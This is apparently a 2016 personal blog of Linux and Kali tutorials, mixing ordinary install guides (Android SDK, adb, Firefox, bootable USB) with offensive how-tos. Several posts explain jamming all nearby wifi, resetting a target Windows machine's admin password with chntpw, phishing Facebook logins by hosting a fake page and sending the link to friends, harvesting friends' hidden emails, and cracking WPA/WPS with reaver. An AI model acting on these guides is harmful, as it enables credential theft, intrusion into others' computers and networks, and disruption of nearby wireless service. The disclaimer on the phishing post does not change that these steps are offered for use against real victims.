Tuesday 23 August 2016

Install android sdk (adb and fastboot) on kali linux.




many users now using debian (ubuntu, kali).
for android development on kali linux you will need to install android sdk.

today i will explain how to install android sdk on kali,

 if you want to install only adb and fastboot(without whole android sdk) then follow this link

Method 1:

1. First download android sdk by following command:

wget http://dl.google.com/android/android-sdk_r24.2-linux.tgz

2. Extract package:

 tar -xvf android-sdk_r24.2-linux.tgz

3. Change Directory:

cd android-sdk-linux/tools


4.  install sdk package:
  ./android update sdk --no-ui

5. set sdk path:


export PATH=${PATH}:/usr/share/android-sdk/tools:/usr/share/android-sdk/platform-tools










Method 2:(Easy and command line)

1.  apt-get install android-sdk

it will take some time to download and install whole android sdk,




Install adb and fastboot(without whole sdk) on kali/ubuntu.

To install adb and fastboot without installing whole android sdk on kali you need to follow these step:

  • open terminal 
  • type:
  • apt-get install android-tools-adb android-tools-fastboot

it will install adb and fastboot on your debian system

for working properly adb and fastboot make sure your system have proper repositories installed.

if you have problem running adb and fastboot then tryt o install ib32stdc++6 by following command:

apt-get install lib32stdc++6 lib32z1 lib32z1-dev
 
 
 
it will solve your problem.
 
 

Saturday 7 May 2016

How to jam wifi

today i find a python script that will jam your area wifi that come in wireless range.
so i am sharing this.
here a that script i am sharing with you.
wifi jammer
How to use wifi jammer python script.
1. Download zip file from github.


2. extract it.

3. go to terminal and change directory where your python script is located.

4. run the script:

python wifijammer.py
 
 
5. it will stop all wireless network that in your laptop wireless range.
thanx.

comment here if any issue is arise.
 

How to Create a Kali Bootable USB Drive from ubuntu.

1. insert your usb drive.
2. run the command below.
 it will show all drive
sudo fdisk -l

3. the output will look somthing like this, showing an additional device.


4. change directory where your iso file is located.

5. type in terminal

dd if=filename.iso of=/dev/sdb bs=512k

6. hit enter

after sometime you will see like this:

5823+1 records in
5823+1 records out
3053371392 bytes (3.1 GB) copied, 746.211 s, 4.1 MB/s

you have successfully made your kali bootable.

How to install filezilla on kali linux.

sudo add-apt-repository ppa:adabbas/1stppa
sudo apt-get update
sudo apt-get install filezilla

How to install firefox in kali linux.

To install firefox in kali linux first you remove iceweasel, (iceweasel is default browser come preinstalled with kali linux)
 to remove iceweasel

apt-get remove iceweasel
then install firefox by command:

echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list > /dev/null
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
apt-get update
apt-get install firefox-mozilla-build
 
 

How to see hidden email address of facebook friends.




1. login your yahoo account or if you don't have, create a new one.
2. click on contact.
3. next click on import contacts from another accounts.

4. now click on import button that you will see opposite facebook logo.
5. a new tab of facebook will be open in your browser window,
6. login with facebook,
7. its done, all your contacts have been imported, you can check your friends email on contacts tab.
comments are open.

Crack Window password with Kali live



Hello friends this is my new post on this blog, today i am going to tell you about HOW TO RESET ADMIN PASSWORDS FOR WINDOWS 7, WINDOWS 8,WINDOWS 10.

  • prerequisites

  1. bootable kali linux cd/usb
  2. a windows machine (which you want to hack )
to reset windows password we will use chntpw for editing the SAM database where Windows stores password hashes.

  • What is chntpw?

           chntpw is a software utility for resetting or blanking local passwords used by Windows NT, 2000, XP, Vista, 7, 8 and 8.1. It does this by editing the SAM                 database where Windows stores password hashes.see more on wikipedia

  • What is SAM database?

           The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista and Windows 7 that stores users' passwords. More on wiki and Microsoft
         now lets start:

Boot Windows machine with the LiveCD.
select Live

open terminal
mount partition on which Windows System files are installed(C: Drive of Windows). it name could be sda1, sda3 or something like like this.
mount /dev/sda1 /mnt
now go to Windows password database directory, generally located in /Windows/System32/config/
in your System it could be like this
cd /mnt/Windows/System32/config
type command below for list out all users.
chntpw -l SAM
select user Administartor by following this command.
chntpw -u Administrator SAM
 
 
now it will open a menu to reset the password.
Select right option and save changes.
its done now you can login as a admin user on your Windows Machine.
comments are open.

Saturday 12 March 2016

How to install android on ubuntu


    first install virtual box:

1. open terminal by pressing ctrl+alt+t.
    type "sudo apt-get install virtualbox"
    it will ask for password enter password and press enter.
    now you have successfull installed virtualbox in your ubuntu 
    machine.


2. DOWNLOD android image from here


3.CREATE A VIRTUAL MACHINE FOR ANDROID:
   
    -open virtual box by typing "virtualbox" in terminal.
    -click on new button.
    -fill following setting
      name-android
      type-linux
      Virsion-Linux 2.6/3.x(32-bit)

                    

how to hack a facebook account 2016.

how to hack a facebook account 2016.

1.
  download facebook phishing login page from here.(change page name to index.html )
download


2. download post.php file.
download



3. now sign up on a free web hosting account on 3gb.com or 000webhost.com or any other hosting service.

4.
   login your hosting account and open file manager

5.
   upload facebook phishing page and post.php in root directory.if there is already a file called index.html delete that file.

6.
  now note your web address 

6. for example your address is xyz.com/index.html(index.html is important because that is your phishing page)

7. send this link to your friends (xyz.com/index.html)

8. when they login from that link you will receive facebook username and password (u will see on your root directory a text file is created open that and here you see username and password)


this is for education purpose please don't do illegal activity.

Friday 11 March 2016

How to downgrade libpcap

How to downgrade libpcap




here are few steps for downgrading libpcap libpcap0.8_1.5.3-2 to 1.4.0-2


1. 
   Open ubuntu software center
   in top right corner search "libpcap"
   it will show you like image below
   click on Development library and header files for libpcap0.8 and then
   click on remove


2. Also remove System interface for user-level packet capture(see image below)



3. Download ibpcap0.8_1.4.0-2 from herehere

4. Place it on any directory and change directory in terminal.
        (for example you place in download directory then change directory
          by typing this  "cd ~/Downloads")

5. Install it by following command

“sudo dpkg -i libpcap0.8_1.4.0-2_amd64.deb” 







Comment if any issue arise.

 



    





Tuesday 1 March 2016

Solution for WARNING: Failed to associate with F4:F2:6D:80:B8:66 (ESSID: (null)



if you are trying wpa cracking with ubuntu/linux and and error come like this.


[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[!] WARNING: Failed to associate with F4:F2:6D:80:B8:66 (ESSID: Null)
[!] WARNING: Failed to associate with F4:F2:6D:80:B8:66 (ESSID: Null)
[!] WARNING: Failed to associate with F4:F2:6D:80:B8:66 (ESSID: Null)
[!] WARNING: Failed to associate with F4:F2:6D:80:B8:66 (ESSID: Null)
[!] WARNING: Failed to associate with F4:F2:6D:80:B8:66 (ESSID: Null)
[!] WARNING: Failed to associate with F4:F2:6D:80:B8:66 (ESSID: Null)
[!] WARNING: Failed to associate with F4:F2:6D:80:B8:66 (ESSID: Null)

 

it is not reaver problem it is libpcap issue. to solve this issue downgrade your libcap(any virsion) to  libpcap0.8_1.4.0-2

 Solution:


First Step:
      Download ibpcap0.8_1.4.0-2 from here
    



Second Step :
        place it on any directory and change directory in terminal.
        (for example you place in download directory then change directory
          by typing this  "cd ~/Downloads")


Last Step :
        install it by following command
         "sudo dpkg -i libpcap0.8_1.4.0-2_amd64.deb" 
 

How to reboot tp link router

How to reboot tp link router


First:

enter ip 192.168.1.1  or 192.168.0.1






enter username and password if you not change default password then
enter admin and admin for username and password.







 Next Step

under  Maintenance  click on System Tools
 
then click on reboo.
done.

How to hack/crack Wifi password on ubuntu/linux.






Here are few step follow them.

Step 1 :
       install airmon

       sudo apt-get update
       sudo apt-get install aircrack-ng


step 2 :
       install reaver

       sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
       wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
       tar -xzvf reaver-1.4.tar.gz
       cd reaver-1.4
       cd src
       ./configure
       make
       sudo make install




Step 3 :
       open terminal and type
       sudo airmon-ng start wlan0


       it will show you :
       Interface,chipest,driver
       (and you will see monitor mode enable on which interface ex. mon0)



step 4 :
       sudo airodump-ng mon0
       (where mon0 is your interface in which monitor mode inabled)




       it will show you bssid beacons data etc. details of currently inrange            networks.
       copy bssid and here is your finl step:





 








step 5 :

        sudo -s reaver -i mon0 -b 10:D3:8A:98:BB:E7 -vv



         now it starts cracking wpa passwords